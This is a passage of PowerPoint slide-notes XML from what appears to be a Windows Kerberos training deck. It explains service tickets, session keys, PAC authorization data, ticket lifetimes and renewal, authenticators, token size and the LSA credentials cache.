              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A service ticket enables the ticket-granting service (TGS) to safely transport the requester's credentials to the target server or service.</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KDC responds to the client's request to connect to a service by sending both copies of the session key to the client. The client's copy of the session key is encrypted with the key that the KDC shares with the client. The service's copy of the session key is embedded, along with information about the client, in a data structure called a service ticket. The entire structure is then encrypted with the key that the KDC shares with the service. The ticket—with the service's copy of the session key safely inside—becomes the client's responsibility to manage until it contacts the service.</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A service ticket is used to authenticate with services other than the TGS and is meant only for the target service.</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A service ticket is encrypted with a service key, which is a long-term key shared by the KDC and the target service. Thus, although the client manages the service ticket, the client cannot read it. Only the KDC and the target service can read tickets, enabling secure access to user credentials, the session key, and other information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Note:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC is simply providing a ticket-granting service. It does not keep track of its messages to make sure they reach the intended address. No harm will be done if the KDC's messages fall into the wrong hands. Only someone who knows the client's secret key can decrypt the client's copy of the session key. Only someone who knows the server's secret key can read what is inside the ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>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When the client receives the KDC's reply, it extracts the ticket and the client's copy of the session key, putting both aside in a secure cache (located in volatile memory, not on disk). When the client wants admission to the server, it sends the server a message that consists of the ticket, which is still encrypted with the server's secret key, and an authenticator, which is encrypted with the session key. The ticket and authenticator together are the client's credentials to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="900"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Benefits of service tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The server does not have to store the session key that it uses in communicating with clients. It is the client's responsibility to hold a ticket for the server in its credentials cache and present the ticket each time it wants access to the server. Whenever the server receives a service ticket from a client, the server can use its secret key to decrypt the ticket and extract the session key. When the server no longer needs the session key, it can discard it.</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client does not need to go back to the KDC each time it wants access to this particular server. Service tickets can be reused. To guard against the possibility that someone might steal a copy of a ticket, service tickets have an expiration time that is specified by the KDC in the ticket's data structure.</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How long a ticket is valid depends on the policy for the realm. Although the RFC recommends a maximum ticket lifetime of one day, in both MIT Kerberos 5 Release 1.3.1 and the Windows 2000 or Windows Server 2003 implementations of the Kerberos protocol, tickets are good for no longer than 10 hours by default, about the length of a normal logon session. When the user logs off, the credentials cache is flushed and all service tickets—as well as all session keys—are destroyed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="900"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What information clients have about tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A client needs to have some information about what is inside tickets and TGTs in order to manage its credentials cache. When the KDC returns a ticket and session key as the result of an authentication service (AS) or ticket-granting service (TGS) exchange, it packages the client's copy of the session key in a data structure that includes the information in the following ticket fields: Authentication Time, Start Time, End Time, and Renew Till. The entire structure is encrypted in the client's key and returned with the KRB_AS_REP or KRB_TGS_REP messages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900"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Kerberos authorization data for Windows accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Kerberos protocol describes a number of fields to be used in the authentication exchange. One of these, the optional authorization data field, is intended to be specific to the end service, in this case, Microsoft authorization. The Microsoft implementation follows the Kerberos specification (RFC 1510) by using the authorization field to store information about user identity and group membership. This information is stored in Microsoft authorization data that is generated by a domain controller during an AS or TGS request. The Microsoft authorization data includes the following groups of information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Credential information.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Information about the ticket and the client, such as Group IDs, which list relative IDs (RIDs) that belong to the client for his or her domain and groups.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Client information.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Ensures that the ticket belongs to the client who is submitting it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Supplemental credentials.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Returned by the KDC service to enable PKINIT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Signatures.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The Microsoft authorization data contains two digital signatures, one for the domain controller and one for the server offering the service. These signatures are used to prevent clients or untrusted services from generating their own forged Microsoft authorization data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PAC-request pre-authentication data.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Normally, the Microsoft authorization data is included in every pre-authenticated ticket received from an AS request. However, a client can also explicitly request — with the privilege attribute certificate (PAC)-request pre-authentication data field — to include or not include SIDs. If the field is present, the account SIDs will be included. If the field is not present, SIDs will not be included.</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For more information about Microsoft authorization data present in Kerberos tickets issued by Windows domain controllers, see "Utilizing the Windows 2000 Authorization Data in Kerberos Tickets for Access Control to Resources," a Windows Development (General) topic on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>MSDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900"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How the KDC limits a ticket's lifetime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Each ticket has a start time and an expiration time. At any time after the start time but before the expiration time, a client holding a ticket for a service can present the ticket and gain access to the service, no matter how many times the client has used the ticket before. In order to reduce the risk that a ticket or the corresponding session key might be compromised, administrators can set the maximum lifetime for tickets. The maximum lifetime for tickets setting is an element of Kerberos policy.</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When a client asks the KDC for a ticket to a service, the client can request a specific start time. If this time is missing from the request or is a time in the past, the KDC sets the ticket's start time field to the current time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Whether or not a client specifies a start time, its request must include a desired expiration time. The KDC determines the value in a ticket's End Time field by adding the maximum ticket life fixed by Kerberos policy to the value in the ticket's Start Time field. It then compares the result with the requested expiration time. Whichever time is sooner becomes the ticket's end time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900"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What happens when tickets expire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC does not notify clients when service tickets or TGTs are about to expire. Furthermore, other than keeping short-term records needed to prevent replay attacks, it does not keep track of transactions with clients.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If a client presents an expired service ticket when requesting a connection to a server, the server returns an error message. The client must request a new service ticket from the KDC. After a connection is authenticated, however, it no longer matters whether the service ticket remains valid. Service tickets are used only to authenticate new connections with servers. Ongoing operations are not interrupted if the service ticket used to authenticate the connection expires during the connection.</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If a client presents an expired TGT when requesting a service ticket from the KDC, the KDC responds with an error message. The client must request a new TGT, and to do that it needs the user's long-term key. If the client did not cache the user's long-term key during the initial logon process, the client might have to ask the user for a password and derive the long-term key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Renewable TGTs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>When tickets are renewable, session keys are refreshed periodically without issuing a completely new ticket. If Kerberos policy permits renewable tickets, the KDC sets a RENEWABLE flag in every ticket it issues and sets two expiration times in the ticket. One expiration time limits the life of the current instance of the ticket; the second expiration time sets a limit on the cumulative lifetime of all instances of the ticket.</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expiration time for the current instance of the ticket is held in the End Time field. As with non-renewable tickets, the value in the End Time field equals the value in the Start Time field plus the value of the maximum ticket life specified by Kerberos policy. A client holding a renewable ticket must send it—presenting a fresh authenticator as well—to the KDC for renewal before the end time is reached. When the KDC receives a ticket for renewal, it checks the value of a second expiration time held in the Renew Till field. This value is set when the ticket is first issued. It equals the value in the tickets Start Time field plus the value of the maximum cumulative ticket life specified by Kerberos policy. When the KDC renews the ticket, it checks to determine if the renew-till time has not yet arrived. If it has not, the KDC issues a new instance of the ticket with a later end time and a new session key.</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This means that administrators can set Kerberos policy so that tickets must be renewed at relatively short intervals—every day, for example. When tickets are renewed, a new session key is issued, minimizing the value of a compromised key. Administrators can also set cumulative ticket life for a relatively long period—one week or one month, for example. At the end of that time, the ticket expires and is no longer valid for renewal.</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3190083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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2584751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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="930303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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31372973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900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Whenever a client sends a ticket to a target server—whether the server is the TGS or some other network server or resource—the client also includes an authenticator in the message. The authenticator verifies that the client listed as the sender in the ticket really is the ticket's source.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900"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Why is an authenticator necessary?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The target server can trust the contents of the ticket because the ticket is encrypted with the target server's secret key. However, the target server cannot trust that the ticket was really sent by the client specified in the ticket. The ticket could have been stolen and is now being included in an imposter's message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>How does the authenticator work?</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authenticator is encrypted with the session key created by the KDC to be used between the client and the target server. Only the client and the target server can access the session key.</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target server uses its secret key to decrypt the ticket, finds the session key inside the ticket, and uses it to decrypt the authenticator.</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If the target server can successfully decrypt the authenticator and if the authenticator's data is accurate, then the target server will trust the source of the ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="900"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The authenticator's timestamp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The timestamp is perhaps the most important piece of data in the authenticator. A domain's Kerberos policy and policies established by applications typically require that the timestamp be within minutes of the time on the target server. Otherwise, the authenticator and the ticket will be rejected. This helps prevent message replay. </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Although no authenticator is included in the initial authentication service request message (explained later in this document), the message does include the client's timestamp in the pre-authentication field.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900"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What is in an authenticator?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The following table lists and describes authenticator fields. The exact data structures for authenticators as well as messages can be found in RFC 1510.</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849171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PAC is inherited from the TGT to the service tickets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to refresh it we need to:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> log off – log on, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>klist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> /purge, TGT renewal</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err="1"/>
              <a:t>Whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> /all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TokenSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 1200 + 40d + 8s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>This formula uses the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>values:d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>: The number of domain local groups a user is a member of plus the number of universal groups outside the user's account domain that the user is a member of plus the number of groups represented in security ID (SID) history.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>s: The number of security global groups that a user is a member of plus the number of universal groups in a user's account domain that the user is a member of.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1200: The estimated value for ticket overhead. This value can vary, depending on factors such as DNS domain name length, client name, and other factors.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37404189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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>On computers running Windows 2000, Windows XP, or Windows Server 2003, tickets and keys obtained from the KDC are stored in a credentials cache, an area of volatile memory protected by the LSA. The credentials cache is never paged to disk. All objects stored there are destroyed when a security principal logs off or when the system is shut down.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The credentials cache is managed by the Kerberos SSP, which runs in the LSA's security context. Whenever tickets and keys need to be obtained or renewed, the LSA calls the Kerberos SSP to accomplish the task.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
